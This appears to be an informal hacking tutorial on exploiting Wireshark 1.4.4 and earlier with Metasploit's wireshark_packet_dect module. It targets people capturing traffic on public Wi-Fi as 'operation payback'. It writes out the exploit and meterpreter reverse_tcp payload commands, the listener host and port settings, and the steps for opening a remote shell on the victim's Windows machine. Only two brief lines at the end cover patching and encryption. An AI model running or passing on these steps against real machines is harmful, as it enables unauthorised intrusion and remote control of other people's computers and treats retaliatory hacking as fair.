Type : Tutorial
Level : Medium
Victim O.S : Windows 7 SP1 (All Windows is vulnerable)
Vulnerable Application : Wireshark <= 1.4.4
What is Wireshark?
Maybe for people who like to learn about networking & security 95% of them should be know about this tool. According to wikipedia, Wireshark is :
a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. Originally named Ethereal, in May 2006 the project was renamed Wireshark due to trademark issues.
for hacking purpose, this tool usually used to capture the packet (TCP/UDP) that came accross wired network or wireless network.
While I'm in Bandung, Indonesia when connected to a free hotspot service inside a mall or café usually your firewall will show an alert every 5 minutes or less, that's because a lot of some kind of people who want to try scanning or collecting packet and intercepting the network, etc…even once a time I see someone was playing with their Wireshark inside that hotspot.
From my story above, it should be really uncomfortable when you know that someone collecting your data using Wireshark and they hope to get something important data from it.
In this tutorial let's say it was operation payback because attacker trying to collecting our data and we will pwned their computer…fair isn't it?
2. Operating System (I'm using Backtrack 5 R1 in this tutorial)
1. As we know that when you're running Wireshark and collecting data it should not in a short time range (1 or 2 minutes), but when you run this tool you will need to collect as much data as possible. When you want to collect a huge data you also need more time, but when you want to collect only a little data you only need a little time also.
2. In this case we will pwned the attacker who capturing our data using Wireshark that sent across the network. Let's open your metasploit by typing msfconsole and use wireshark_packet_dect exploit.
use exploit/windows/misc/wireshark_packet_dect set payload windows/meterpreter/reverse_tcp
3. To view the available options for this exploit, just run show options command from your msf console. In the following picture I'm just set up the important switch that need to set up to perform this attack.
information :set interface eth0 --> our network card interface, to know which one you use wlan0 or eth0 just run ifconfig from your backtrack console set lhost 192.168.8.92 --> your local computer use to attack set lport 443 --> when exploit successfully executed, which port you want to receive the payload in your local computer
4. Before running the exploit command, let say that the attacker now still collecting data using their Wireshark tool like the picture below.
5. Now run the exploit command.
FYI : this attack doesn't always success 100%, if there's no one using their wireshark to capture data in a network then your exploit will return error message
1. Update your Wireshark to the latest version.
2. Use tunneling or encryption to protect your data.
Hope it's useful